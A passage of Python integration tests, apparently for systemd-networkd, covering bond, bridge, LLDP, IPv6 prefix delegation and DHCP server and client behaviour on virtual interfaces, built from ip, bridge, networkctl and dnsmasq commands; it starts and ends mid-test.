self.check_operstate('test1', 'enslaved')
self.check_operstate('bond99', 'routable')
check_output('ip link set dummy98 down')
check_output('ip link set test1 down')
time.sleep(2)
self.check_operstate('dummy98', 'off')
self.check_operstate('test1', 'off')
for trial in range(30):
if trial > 0:
time.sleep(1)
output = check_output('ip address show bond99')
print(output)
if get_operstate('bond99') == 'no-carrier':
break
else:
# Huh? Kernel does not recognize that all slave interfaces are down?
# Let's confirm that networkd's operstate is consistent with ip's result.
self.assertNotRegex(output, 'NO-CARRIER')
class NetworkdBridgeTests(unittest.TestCase, Utilities):
links = [
'bridge99',
'dummy98',
'test1']
units = [
'11-dummy.netdev',
'12-dummy.netdev',
'26-bridge.netdev',
'26-bridge-slave-interface-1.network',
'26-bridge-slave-interface-2.network',
'26-bridge-vlan-master.network',
'26-bridge-vlan-slave.network',
'bridge99-ignore-carrier-loss.network',
'bridge99.network']
routing_policy_rule_tables = ['100']
def setUp(self):
remove_routing_policy_rule_tables(self.routing_policy_rule_tables)
remove_links(self.links)
stop_networkd(show_logs=False)
def tearDown(self):
remove_routing_policy_rule_tables(self.routing_policy_rule_tables)
remove_links(self.links)
remove_unit_from_networkd_path(self.units)
stop_networkd(show_logs=True)
def test_bridge_vlan(self):
copy_unit_to_networkd_unit_path('11-dummy.netdev', '26-bridge-vlan-slave.network',
'26-bridge.netdev', '26-bridge-vlan-master.network')
start_networkd()
self.wait_online(['test1:enslaved', 'bridge99:degraded'])
output = check_output('bridge vlan show dev test1')
print(output)
self.assertNotRegex(output, '4063')
for i in range(4064, 4095):
self.assertRegex(output, f'{i}')
self.assertNotRegex(output, '4095')
output = check_output('bridge vlan show dev bridge99')
print(output)
self.assertNotRegex(output, '4059')
for i in range(4060, 4095):
self.assertRegex(output, f'{i}')
self.assertNotRegex(output, '4095')
def test_bridge_property(self):
copy_unit_to_networkd_unit_path('11-dummy.netdev', '12-dummy.netdev', '26-bridge.netdev',
'26-bridge-slave-interface-1.network', '26-bridge-slave-interface-2.network',
'bridge99.network')
start_networkd()
self.wait_online(['dummy98:enslaved', 'test1:enslaved', 'bridge99:routable'])
output = check_output('ip -d link show test1')
print(output)
self.assertRegex(output, 'master')
self.assertRegex(output, 'bridge')
output = check_output('ip -d link show dummy98')
print(output)
self.assertRegex(output, 'master')
self.assertRegex(output, 'bridge')
output = check_output('ip addr show bridge99')
print(output)
self.assertRegex(output, '192.168.0.15/24')
output = check_output('bridge -d link show dummy98')
print(output)
self.assertEqual(read_bridge_port_attr('bridge99', 'dummy98', 'path_cost'), '400')
self.assertEqual(read_bridge_port_attr('bridge99', 'dummy98', 'hairpin_mode'), '1')
self.assertEqual(read_bridge_port_attr('bridge99', 'dummy98', 'multicast_fast_leave'), '1')
self.assertEqual(read_bridge_port_attr('bridge99', 'dummy98', 'unicast_flood'), '1')
self.assertEqual(read_bridge_port_attr('bridge99', 'dummy98', 'multicast_flood'), '0')
# CONFIG_BRIDGE_IGMP_SNOOPING=y
if (os.path.exists('/sys/devices/virtual/net/bridge00/lower_dummy98/brport/multicast_to_unicast')):
self.assertEqual(read_bridge_port_attr('bridge99', 'dummy98', 'multicast_to_unicast'), '1')
if (os.path.exists('/sys/devices/virtual/net/bridge99/lower_dummy98/brport/neigh_suppress')):
self.assertEqual(read_bridge_port_attr('bridge99', 'dummy98', 'neigh_suppress'), '1')
self.assertEqual(read_bridge_port_attr('bridge99', 'dummy98', 'learning'), '0')
self.assertEqual(read_bridge_port_attr('bridge99', 'dummy98', 'priority'), '23')
self.assertEqual(read_bridge_port_attr('bridge99', 'dummy98', 'bpdu_guard'), '1')
self.assertEqual(read_bridge_port_attr('bridge99', 'dummy98', 'root_block'), '1')
output = check_output('bridge -d link show test1')
print(output)
self.assertEqual(read_bridge_port_attr('bridge99', 'test1', 'priority'), '0')
check_output('ip address add 192.168.0.16/24 dev bridge99')
time.sleep(1)
output = check_output('ip addr show bridge99')
print(output)
self.assertRegex(output, '192.168.0.16/24')
# for issue #6088
print('### ip -6 route list table all dev bridge99')
output = check_output('ip -6 route list table all dev bridge99')
print(output)
self.assertRegex(output, 'ff00::/8 table local metric 256 pref medium')
self.assertEqual(call('ip link del test1'), 0)
time.sleep(3)
self.check_operstate('bridge99', 'degraded-carrier')
check_output('ip link del dummy98')
time.sleep(3)
self.check_operstate('bridge99', 'no-carrier')
output = check_output('ip address show bridge99')
print(output)
self.assertRegex(output, 'NO-CARRIER')
self.assertNotRegex(output, '192.168.0.15/24')
self.assertNotRegex(output, '192.168.0.16/24')
print('### ip -6 route list table all dev bridge99')
output = check_output('ip -6 route list table all dev bridge99')
print(output)
self.assertRegex(output, 'ff00::/8 table local metric 256 (linkdown )?pref medium')
def test_bridge_ignore_carrier_loss(self):
copy_unit_to_networkd_unit_path('11-dummy.netdev', '12-dummy.netdev', '26-bridge.netdev',
'26-bridge-slave-interface-1.network', '26-bridge-slave-interface-2.network',
'bridge99-ignore-carrier-loss.network')
start_networkd()
self.wait_online(['dummy98:enslaved', 'test1:enslaved', 'bridge99:routable'])
check_output('ip address add 192.168.0.16/24 dev bridge99')
time.sleep(1)
check_output('ip link del test1')
check_output('ip link del dummy98')
time.sleep(3)
output = check_output('ip address show bridge99')
print(output)
self.assertRegex(output, 'NO-CARRIER')
self.assertRegex(output, 'inet 192.168.0.15/24 brd 192.168.0.255 scope global bridge99')
self.assertRegex(output, 'inet 192.168.0.16/24 scope global secondary bridge99')
def test_bridge_ignore_carrier_loss_frequent_loss_and_gain(self):
copy_unit_to_networkd_unit_path('26-bridge.netdev', '26-bridge-slave-interface-1.network',
'bridge99-ignore-carrier-loss.network')
start_networkd()
self.wait_online(['bridge99:no-carrier'])
for trial in range(4):
check_output('ip link add dummy98 type dummy')
check_output('ip link set dummy98 up')
if trial < 3:
check_output('ip link del dummy98')
self.wait_online(['bridge99:routable', 'dummy98:enslaved'])
output = check_output('ip address show bridge99')
print(output)
self.assertRegex(output, 'inet 192.168.0.15/24 brd 192.168.0.255 scope global bridge99')
output = check_output('ip rule list table 100')
print(output)
self.assertEqual(output, '0: from all to 8.8.8.8 lookup 100')
class NetworkdLLDPTests(unittest.TestCase, Utilities):
links = ['veth99']
units = [
'23-emit-lldp.network',
'24-lldp.network',
'25-veth.netdev']
def setUp(self):
remove_links(self.links)
stop_networkd(show_logs=False)
def tearDown(self):
remove_links(self.links)
remove_unit_from_networkd_path(self.units)
stop_networkd(show_logs=True)
def test_lldp(self):
copy_unit_to_networkd_unit_path('23-emit-lldp.network', '24-lldp.network', '25-veth.netdev')
start_networkd()
self.wait_online(['veth99:degraded', 'veth-peer:degraded'])
output = check_output(*networkctl_cmd, 'lldp', env=env)
print(output)
self.assertRegex(output, 'veth-peer')
self.assertRegex(output, 'veth99')
class NetworkdRATests(unittest.TestCase, Utilities):
links = ['veth99']
units = [
'25-veth.netdev',
'ipv6-prefix.network',
'ipv6-prefix-veth.network']
def setUp(self):
remove_links(self.links)
stop_networkd(show_logs=False)
def tearDown(self):
remove_links(self.links)
remove_unit_from_networkd_path(self.units)
stop_networkd(show_logs=True)
def test_ipv6_prefix_delegation(self):
copy_unit_to_networkd_unit_path('25-veth.netdev', 'ipv6-prefix.network', 'ipv6-prefix-veth.network')
start_networkd()
self.wait_online(['veth99:routable', 'veth-peer:degraded'])
output = check_output(*networkctl_cmd, 'status', 'veth99', env=env)
print(output)
self.assertRegex(output, '2002:da8:1:0')
class NetworkdDHCPServerTests(unittest.TestCase, Utilities):
links = ['veth99']
units = [
'25-veth.netdev',
'dhcp-client.network',
'dhcp-client-timezone-router.network',
'dhcp-server.network',
'dhcp-server-timezone-router.network']
def setUp(self):
remove_links(self.links)
stop_networkd(show_logs=False)
def tearDown(self):
remove_links(self.links)
remove_unit_from_networkd_path(self.units)
stop_networkd(show_logs=True)
def test_dhcp_server(self):
copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-client.network', 'dhcp-server.network')
start_networkd()
self.wait_online(['veth99:routable', 'veth-peer:routable'])
output = check_output(*networkctl_cmd, 'status', 'veth99', env=env)
print(output)
self.assertRegex(output, '192.168.5.*')
self.assertRegex(output, 'Gateway: 192.168.5.1')
self.assertRegex(output, 'DNS: 192.168.5.1')
self.assertRegex(output, 'NTP: 192.168.5.1')
def test_emit_router_timezone(self):
copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-client-timezone-router.network', 'dhcp-server-timezone-router.network')
start_networkd()
self.wait_online(['veth99:routable', 'veth-peer:routable'])
output = check_output(*networkctl_cmd, 'status', 'veth99', env=env)
print(output)
self.assertRegex(output, 'Gateway: 192.168.5.*')
self.assertRegex(output, '192.168.5.*')
self.assertRegex(output, 'Europe/Berlin')
class NetworkdDHCPClientTests(unittest.TestCase, Utilities):
links = [
'veth99',
'vrf99']
units = [
'25-veth.netdev',
'25-vrf.netdev',
'25-vrf.network',
'dhcp-client-anonymize.network',
'dhcp-client-decline.network',
'dhcp-client-gateway-onlink-implicit.network',
'dhcp-client-ipv4-dhcp-settings.network',
'dhcp-client-ipv4-only-ipv6-disabled.network',
'dhcp-client-ipv4-only.network',
'dhcp-client-ipv6-only.network',
'dhcp-client-ipv6-rapid-commit.network',
'dhcp-client-keep-configuration-dhcp-on-stop.network',
'dhcp-client-keep-configuration-dhcp.network',
'dhcp-client-listen-port.network',
'dhcp-client-reassign-static-routes-ipv4.network',
'dhcp-client-reassign-static-routes-ipv6.network',
'dhcp-client-route-metric.network',
'dhcp-client-route-table.network',
'dhcp-client-use-dns-ipv4-and-ra.network',
'dhcp-client-use-dns-ipv4.network',
'dhcp-client-use-dns-no.network',
'dhcp-client-use-dns-yes.network',
'dhcp-client-use-domains.network',
'dhcp-client-use-routes-no.network',
'dhcp-client-vrf.network',
'dhcp-client-with-ipv4ll-fallback-with-dhcp-server.network',
'dhcp-client-with-ipv4ll-fallback-without-dhcp-server.network',
'dhcp-client-with-static-address.network',
'dhcp-client.network',
'dhcp-server-decline.network',
'dhcp-server-veth-peer.network',
'dhcp-v4-server-veth-peer.network',
'dhcp-client-use-domains.network',
'static.network']
def setUp(self):
stop_dnsmasq(dnsmasq_pid_file)
remove_links(self.links)
stop_networkd(show_logs=False)
def tearDown(self):
stop_dnsmasq(dnsmasq_pid_file)
remove_lease_file()
remove_log_file()
remove_links(self.links)
remove_unit_from_networkd_path(self.units)
stop_networkd(show_logs=True)
def test_dhcp_client_ipv6_only(self):
copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network', 'dhcp-client-ipv6-only.network')
start_networkd()
self.wait_online(['veth-peer:carrier'])
start_dnsmasq()
self.wait_online(['veth99:routable', 'veth-peer:routable'])
output = check_output(*networkctl_cmd, 'status', 'veth99', env=env)
print(output)
self.assertRegex(output, '2600::')
self.assertNotRegex(output, '192.168.5')
# Confirm that ipv6 token is not set in the kernel
output = check_output('ip token show dev veth99')
print(output)
self.assertRegex(output, 'token :: dev veth99')
def test_dhcp_client_ipv4_only(self):
copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network', 'dhcp-client-ipv4-only-ipv6-disabled.network')
start_networkd()
self.wait_online(['veth-peer:carrier'])
start_dnsmasq(additional_options='--dhcp-option=option:dns-server,192.168.5.6,192.168.5.7', lease_time='2m')
self.wait_online(['veth99:routable', 'veth-peer:routable'])
output = check_output(*networkctl_cmd, 'status', 'veth99', env=env)
print(output)
self.assertNotRegex(output, '2600::')
self.assertRegex(output, '192.168.5')
self.assertRegex(output, '192.168.5.6')
self.assertRegex(output, '192.168.5.7')
# checking routes to DNS servers
output = check_output('ip route show dev veth99')
print(output)
self.assertRegex(output, r'192.168.5.1 proto dhcp scope link src 192.168.5.181 metric 1024')
self.assertRegex(output, r'192.168.5.6 proto dhcp scope link src 192.168.5.181 metric 1024')
self.assertRegex(output, r'192.168.5.7 proto dhcp scope link src 192.168.5.181 metric 1024')
stop_dnsmasq(dnsmasq_pid_file)
start_dnsmasq(additional_options='--dhcp-option=option:dns-server,192.168.5.1,192.168.5.7,192.168.5.8', lease_time='2m')
# Sleep for 120 sec as the dnsmasq minimum lease time can only be set to 120
print('Wait for the dynamic address to be renewed')
time.sleep(125)
self.wait_online(['veth99:routable', 'veth-peer:routable'])
output = check_output(*networkctl_cmd, 'status', 'veth99', env=env)
print(output)
self.assertNotRegex(output, '2600::')
self.assertRegex(output, '192.168.5')
self.assertNotRegex(output, '192.168.5.6')
self.assertRegex(output, '192.168.5.7')
self.assertRegex(output, '192.168.5.8')
# checking routes to DNS servers
output = check_output('ip route show dev veth99')
print(output)
self.assertNotRegex(output, r'192.168.5.6')
self.assertRegex(output, r'192.168.5.1 proto dhcp scope link src 192.168.5.181 metric 1024')
self.assertRegex(output, r'192.168.5.7 proto dhcp scope link src 192.168.5.181 metric 1024')
self.assertRegex(output, r'192.168.5.8 proto dhcp scope link src 192.168.5.181 metric 1024')
def test_dhcp_client_ipv4_ipv6(self):
copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network', 'dhcp-client-ipv6-only.network',
'dhcp-client-ipv4-only.network')
start_networkd()
self.wait_online(['veth-peer:carrier'])
start_dnsmasq()
self.wait_online(['veth99:routable', 'veth-peer:routable'])
# link become 'routable' when at least one protocol provide an valid address.
self.wait_address('veth99', r'inet 192.168.5.[0-9]*/24 brd 192.168.5.255 scope global dynamic', ipv='-4')
self.wait_address('veth99', r'inet6 2600::[0-9a-f]*/128 scope global (dynamic noprefixroute|noprefixroute dynamic)', ipv='-6')
output = check_output(*networkctl_cmd, 'status', 'veth99', env=env)
print(output)
self.assertRegex(output, '2600::')
self.assertRegex(output, '192.168.5')
def test_dhcp_client_settings(self):
copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network', 'dhcp-client-ipv4-dhcp-settings.network')
start_networkd()
self.wait_online(['veth-peer:carrier'])
start_dnsmasq()
self.wait_online(['veth99:routable', 'veth-peer:routable'])
print('## ip address show dev veth99')
output = check_output('ip address show dev veth99')
print(output)
self.assertRegex(output, '12:34:56:78:9a:bc')
self.assertRegex(output, '192.168.5')
self.assertRegex(output, '1492')
print('## ip route show table main dev veth99')
output = check_output('ip route show table main dev veth99')
print(output)
# See issue #8726
main_table_is_empty = output == ''
if not main_table_is_empty:
self.assertNotRegex(output, 'proto dhcp')
print('## ip route show table 211 dev veth99')
output = check_output('ip route show table 211 dev veth99')
print(output)
self.assertRegex(output, 'default via 192.168.5.1 proto dhcp')
if main_table_is_empty:
self.assertRegex(output, '192.168.5.0/24 proto dhcp')
self.assertRegex(output, '192.168.5.0/24 via 192.168.5.5 proto dhcp')
self.assertRegex(output, '192.168.5.1 proto dhcp scope link')
print('## dnsmasq log')
self.assertTrue(search_words_in_dnsmasq_log('vendor class: SusantVendorTest', True))
self.assertTrue(search_words_in_dnsmasq_log('DHCPDISCOVER(veth-peer) 12:34:56:78:9a:bc'))
self.assertTrue(search_words_in_dnsmasq_log('client provides name: test-hostname'))
self.assertTrue(search_words_in_dnsmasq_log('26:mtu'))
def test_dhcp6_client_settings_rapidcommit_true(self):
copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network', 'dhcp-client-ipv6-only.network')
start_networkd()
self.wait_online(['veth-peer:carrier'])
start_dnsmasq()
self.wait_online(['veth99:routable', 'veth-peer:routable'])
output = check_output('ip address show dev veth99')
print(output)
self.assertRegex(output, '12:34:56:78:9a:bc')
self.assertTrue(search_words_in_dnsmasq_log('14:rapid-commit', True))
def test_dhcp6_client_settings_rapidcommit_false(self):
copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network', 'dhcp-client-ipv6-rapid-commit.network')
start_networkd()
self.wait_online(['veth-peer:carrier'])
start_dnsmasq()
self.wait_online(['veth99:routable', 'veth-peer:routable'])
output = check_output('ip address show dev veth99')
print(output)
self.assertRegex(output, '12:34:56:78:9a:bc')
self.assertFalse(search_words_in_dnsmasq_log('14:rapid-commit', True))
def test_dhcp_client_settings_anonymize(self):
copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network', 'dhcp-client-anonymize.network')
start_networkd()
self.wait_online(['veth-peer:carrier'])
start_dnsmasq()
self.wait_online(['veth99:routable', 'veth-peer:routable'])
self.assertFalse(search_words_in_dnsmasq_log('VendorClassIdentifier=SusantVendorTest', True))
self.assertFalse(search_words_in_dnsmasq_log('test-hostname'))
self.assertFalse(search_words_in_dnsmasq_log('26:mtu'))
def test_dhcp_client_listen_port(self):
copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network', 'dhcp-client-listen-port.network')
start_networkd()
self.wait_online(['veth-peer:carrier'])
start_dnsmasq('--dhcp-alternate-port=67,5555')
self.wait_online(['veth99:routable', 'veth-peer:routable'])
output = check_output('ip -4 address show dev veth99')
print(output)
self.assertRegex(output, '192.168.5.* dynamic')
def test_dhcp_client_with_static_address(self):
copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-v4-server-veth-peer.network',
'dhcp-client-with-static-address.network')
start_networkd()
self.wait_online(['veth-peer:carrier'])
start_dnsmasq()
self.wait_online(['veth99:routable', 'veth-peer:routable'])
output = check_output('ip address show dev veth99 scope global')
print(output)
self.assertRegex(output, r'inet 192.168.5.250/24 brd 192.168.5.255 scope global veth99')
self.assertRegex(output, r'inet 192.168.5.[0-9]*/24 brd 192.168.5.255 scope global secondary dynamic veth99')
output = check_output('ip route show dev veth99')
print(output)
self.assertRegex(output, r'default via 192.168.5.1 proto dhcp src 192.168.5.[0-9]* metric 1024')
self.assertRegex(output, r'192.168.5.0/24 proto kernel scope link src 192.168.5.250')
self.assertRegex(output, r'192.168.5.0/24 via 192.168.5.5 proto dhcp src 192.168.5.[0-9]* metric 1024')
self.assertRegex(output, r'192.168.5.1 proto dhcp scope link src 192.168.5.[0-9]* metric 1024')
def test_dhcp_route_table_id(self):
copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-v4-server-veth-peer.network', 'dhcp-client-route-table.network')
start_networkd()
self.wait_online(['veth-peer:carrier'])
start_dnsmasq()
self.wait_online(['veth99:routable', 'veth-peer:routable'])
output = check_output('ip route show table 12')
print(output)
self.assertRegex(output, 'veth99 proto dhcp')
self.assertRegex(output, '192.168.5.1')
def test_dhcp_route_metric(self):
copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-v4-server-veth-peer.network', 'dhcp-client-route-metric.network')
start_networkd()
self.wait_online(['veth-peer:carrier'])
start_dnsmasq()
self.wait_online(['veth99:routable', 'veth-peer:routable'])
output = check_output('ip route show dev veth99')
print(output)
self.assertRegex(output, 'metric 24')
def test_dhcp_client_reassign_static_routes_ipv4(self):
copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network',
'dhcp-client-reassign-static-routes-ipv4.network')
start_networkd()
self.wait_online(['veth-peer:carrier'])
start_dnsmasq(lease_time='2m')
self.wait_online(['veth99:routable', 'veth-peer:routable'])
output = check_output('ip address show dev veth99 scope global')
print(output)
self.assertRegex(output, r'inet 192.168.5.[0-9]*/24 brd 192.168.5.255 scope global dynamic veth99')
output = check_output('ip route show dev veth99')
print(output)
self.assertRegex(output, r'192.168.5.0/24 proto kernel scope link src 192.168.5.[0-9]*')
self.assertRegex(output, r'192.168.5.0/24 proto static')
self.assertRegex(output, r'192.168.6.0/24 proto static')
self.assertRegex(output, r'192.168.7.0/24 proto static')
stop_dnsmasq(dnsmasq_pid_file)
start_dnsmasq(ipv4_range='192.168.5.210,192.168.5.220', lease_time='2m')
# Sleep for 120 sec as the dnsmasq minimum lease time can only be set to 120
print('Wait for the dynamic address to be renewed')
time.sleep(125)
self.wait_online(['veth99:routable'])
output = check_output('ip route show dev veth99')
print(output)
self.assertRegex(output, r'192.168.5.0/24 proto kernel scope link src 192.168.5.[0-9]*')
self.assertRegex(output, r'192.168.5.0/24 proto static')
self.assertRegex(output, r'192.168.6.0/24 proto static')
self.assertRegex(output, r'192.168.7.0/24 proto static')
def test_dhcp_client_reassign_static_routes_ipv6(self):
copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network',
'dhcp-client-reassign-static-routes-ipv6.network')
start_networkd()
self.wait_online(['veth-peer:carrier'])
start_dnsmasq(lease_time='2m')
self.wait_online(['veth99:routable', 'veth-peer:routable'])
output = check_output('ip address show dev veth99 scope global')
print(output)
self.assertRegex(output, r'inet6 2600::[0-9a-f]*/128 scope global (noprefixroute dynamic|dynamic noprefixroute)')
output = check_output('ip -6 route show dev veth99')
print(output)
self.assertRegex(output, r'2600::/64 proto ra metric 1024')
self.assertRegex(output, r'2600:0:0:1::/64 proto static metric 1024 pref medium')
stop_dnsmasq(dnsmasq_pid_file)
start_dnsmasq(ipv6_range='2600::30,2600::40', lease_time='2m')
# Sleep for 120 sec as the dnsmasq minimum lease time can only be set to 120
print('Wait for the dynamic address to be renewed')
time.sleep(125)
self.wait_online(['veth99:routable'])
output = check_output('ip -6 route show dev veth99')
print(output)
self.assertRegex(output, r'2600::/64 proto ra metric 1024')
self.assertRegex(output, r'2600:0:0:1::/64 proto static metric 1024 pref medium')
def test_dhcp_keep_configuration_dhcp(self):
copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-v4-server-veth-peer.network', 'dhcp-client-keep-configuration-dhcp.network')
start_networkd()
self.wait_online(['veth-peer:carrier'])
start_dnsmasq(lease_time='2m')
self.wait_online(['veth99:routable', 'veth-peer:routable'])
output = check_output('ip address show dev veth99 scope global')
print(output)
self.assertRegex(output, r'192.168.5.*')
output = check_output(*networkctl_cmd, 'status', 'veth99', env=env)
print(output)
self.assertRegex(output, r'192.168.5.*')
# Stopping dnsmasq as networkd won't be allowed to renew the DHCP lease.
stop_dnsmasq(dnsmasq_pid_file)
# Sleep for 120 sec as the dnsmasq minimum lease time can only be set to 120
print('Wait for the dynamic address to be expired')
time.sleep(125)
print('The lease address should be kept after lease expired')
output = check_output('ip address show dev veth99 scope global')
print(output)
self.assertRegex(output, r'192.168.5.*')
output = check_output(*networkctl_cmd, 'status', 'veth99', env=env)
print(output)
self.assertRegex(output, r'192.168.5.*')
check_output('systemctl stop systemd-networkd')
print('The lease address should be kept after networkd stopped')
output = check_output('ip address show dev veth99 scope global')
print(output)
self.assertRegex(output, r'192.168.5.*')
output = check_output(*networkctl_cmd, 'status', 'veth99', env=env)
print(output)
self.assertRegex(output, r'192.168.5.*')
start_networkd(3)
self.wait_online(['veth-peer:routable'])
print('Still the lease address should be kept after networkd restarted')
output = check_output('ip address show dev veth99 scope global')
print(output)
self.assertRegex(output, r'192.168.5.*')
output = check_output(*networkctl_cmd, 'status', 'veth99', env=env)
print(output)
self.assertRegex(output, r'192.168.5.*')
def test_dhcp_keep_configuration_dhcp_on_stop(self):
copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-v4-server-veth-peer.network', 'dhcp-client-keep-configuration-dhcp-on-stop.network')
start_networkd()
self.wait_online(['veth-peer:carrier'])
start_dnsmasq(lease_time='2m')
self.wait_online(['veth99:routable', 'veth-peer:routable'])
output = check_output('ip address show dev veth99 scope global')
print(output)
self.assertRegex(output, r'192.168.5.*')
stop_dnsmasq(dnsmasq_pid_file)
check_output('systemctl stop systemd-networkd')
output = check_output('ip address show dev veth99 scope global')
print(output)
self.assertRegex(output, r'192.168.5.*')
restart_networkd(3)
self.wait_online(['veth-peer:routable'])
output = check_output('ip address show dev veth99 scope global')
print(output)
self.assertNotRegex(output, r'192.168.5.*')
def test_dhcp_client_reuse_address_as_static(self):
copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network', 'dhcp-client.network')
start_networkd()
self.wait_online(['veth-peer:carrier'])
start_dnsmasq()
self.wait_online(['veth99:routable', 'veth-peer:routable'])
# link become 'routable' when at least one protocol provide an valid address.
self.wait_address('veth99', r'inet 192.168.5.[0-9]*/24 brd 192.168.5.255 scope global dynamic', ipv='-4')
self.wait_address('veth99', r'inet6 2600::[0-9a-f]*/128 scope global (dynamic noprefixroute|noprefixroute dynamic)', ipv='-6')
output = check_output('ip address show dev veth99 scope global')
print(output)
self.assertRegex(output, '192.168.5')
self.assertRegex(output, '2600::')
ipv4_address = re.search(r'192.168.5.[0-9]*/24', output)
ipv6_address = re.search(r'2600::[0-9a-f:]*/128', output)
static_network = '\n'.join(['[Match]', 'Name=veth99', '[Network]', 'IPv6AcceptRA=no', 'Address=' + ipv4_address.group(), 'Address=' + ipv6_address.group()])
print(static_network)
remove_unit_from_networkd_path(['dhcp-client.network'])
with open(os.path.join(network_unit_file_path, 'static.network'), mode='w') as f:
f.write(static_network)
# When networkd started, the links are already configured, so let's wait for 5 seconds
# the links to be re-configured.
restart_networkd(5)
self.wait_online(['veth99:routable', 'veth-peer:routable'])
output = check_output('ip -4 address show dev veth99 scope global')
print(output)
self.assertRegex(output, '192.168.5')
self.assertRegex(output, 'valid_lft forever preferred_lft forever')
output = check_output('ip -6 address show dev veth99 scope global')
print(output)
self.assertRegex(output, '2600::')
self.assertRegex(output, 'valid_lft forever preferred_lft forever')
@expectedFailureIfModuleIsNotAvailable('vrf')
def test_dhcp_client_vrf(self):
copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network', 'dhcp-client-vrf.network',
'25-vrf.netdev', '25-vrf.network')
start_networkd()
self.wait_online(['veth-peer:carrier'])
start_dnsmasq()
self.wait_online(['veth99:routable', 'veth-peer:routable', 'vrf99:carrier'])
# link become 'routable' when at least one protocol provide an valid address.
self.wait_address('veth99', r'inet 192.168.5.[0-9]*/24 brd 192.168.5.255 scope global dynamic', ipv='-4')
self.wait_address('veth99', r'inet6 2600::[0-9a-f]*/128 scope global (dynamic noprefixroute|noprefixroute dynamic)', ipv='-6')
print('## ip -d link show dev vrf99')
output = check_output('ip -d link show dev vrf99')
print(output)
self.assertRegex(output, 'vrf table 42')
print('## ip address show vrf vrf99')
output = check_output('ip address show vrf vrf99')
print(output)
self.assertRegex(output, 'inet 169.254.[0-9]*.[0-9]*/16 brd 169.254.255.255 scope link veth99')
self.assertRegex(output, 'inet 192.168.5.[0-9]*/24 brd 192.168.5.255 scope global dynamic veth99')
self.assertRegex(output, 'inet6 2600::[0-9a-f]*/128 scope global (dynamic noprefixroute|noprefixroute dynamic)')
self.assertRegex(output, 'inet6 .* scope link')
print('## ip address show dev veth99')
output = check_output('ip address show dev veth99')
print(output)
self.assertRegex(output, 'inet 169.254.[0-9]*.[0-9]*/16 brd 169.254.255.255 scope link veth99')
self.assertRegex(output, 'inet 192.168.5.[0-9]*/24 brd 192.168.5.255 scope global dynamic veth99')
self.assertRegex(output, 'inet6 2600::[0-9a-f]*/128 scope global (dynamic noprefixroute|noprefixroute dynamic)')
self.assertRegex(output, 'inet6 .* scope link')
print('## ip route show vrf vrf99')
output = check_output('ip route show vrf vrf99')
print(output)
self.assertRegex(output, 'default via 192.168.5.1 dev veth99 proto dhcp src 192.168.5.')
self.assertRegex(output, '169.254.0.0/16 dev veth99 proto kernel scope link src 169.254')
self.assertRegex(output, '192.168.5.0/24 dev veth99 proto kernel scope link src 192.168.5')
self.assertRegex(output, '192.168.5.0/24 via 192.168.5.5 dev veth99 proto dhcp')
self.assertRegex(output, '192.168.5.1 dev veth99 proto dhcp scope link src 192.168.5')
print('## ip route show table main dev veth99')
output = check_output('ip route show table main dev veth99')
print(output)
self.assertEqual(output, '')
def test_dhcp_client_gateway_onlink_implicit(self):
copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network',
'dhcp-client-gateway-onlink-implicit.network')
start_networkd()
self.wait_online(['veth-peer:carrier'])
start_dnsmasq()
self.wait_online(['veth99:routable', 'veth-peer:routable'])
output = check_output(*networkctl_cmd, 'status', 'veth99', env=env)
print(output)
self.assertRegex(output, '192.168.5')
output = check_output('ip route list dev veth99 10.0.0.0/8')
print(output)
self.assertRegex(output, 'onlink')
output = check_output('ip route list dev veth99 192.168.100.0/24')
print(output)
self.assertRegex(output, 'onlink')
def test_dhcp_client_with_ipv4ll_fallback_with_dhcp_server(self):
copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network',
'dhcp-client-with-ipv4ll-fallback-with-dhcp-server.network')
start_networkd()
self.wait_online(['veth-peer:carrier'])
start_dnsmasq(lease_time='2m')
self.wait_online(['veth99:routable', 'veth-peer:routable'])
output = check_output('ip address show dev veth99')
print(output)
output = check_output('ip -6 address show dev veth99 scope global dynamic')
self.assertNotRegex(output, 'inet6 2600::[0-9a-f]*/128 scope global dynamic')
output = check_output('ip -6 address show dev veth99 scope link')
self.assertRegex(output, 'inet6 .* scope link')
output = check_output('ip -4 address show dev veth99 scope global dynamic')
self.assertRegex(output, 'inet 192.168.5.[0-9]*/24 brd 192.168.5.255 scope global dynamic veth99')
output = check_output('ip -4 address show dev veth99 scope link')
self.assertNotRegex(output, 'inet .* scope link')
print('Wait for the dynamic address to be expired')
time.sleep(130)
output = check_output('ip address show dev veth99')
print(output)
output = check_output('ip -6 address show dev veth99 scope global dynamic')
self.assertNotRegex(output, 'inet6 2600::[0-9a-f]*/128 scope global dynamic')
output = check_output('ip -6 address show dev veth99 scope link')
self.assertRegex(output, 'inet6 .* scope link')
output = check_output('ip -4 address show dev veth99 scope global dynamic')
self.assertRegex(output, 'inet 192.168.5.[0-9]*/24 brd 192.168.5.255 scope global dynamic veth99')
output = check_output('ip -4 address show dev veth99 scope link')
self.assertNotRegex(output, 'inet .* scope link')
search_words_in_dnsmasq_log('DHCPOFFER', show_all=True)
def test_dhcp_client_with_ipv4ll_fallback_without_dhcp_server(self):
copy_unit_to_networkd_unit_path('25-veth.netdev', 'dhcp-server-veth-peer.network',
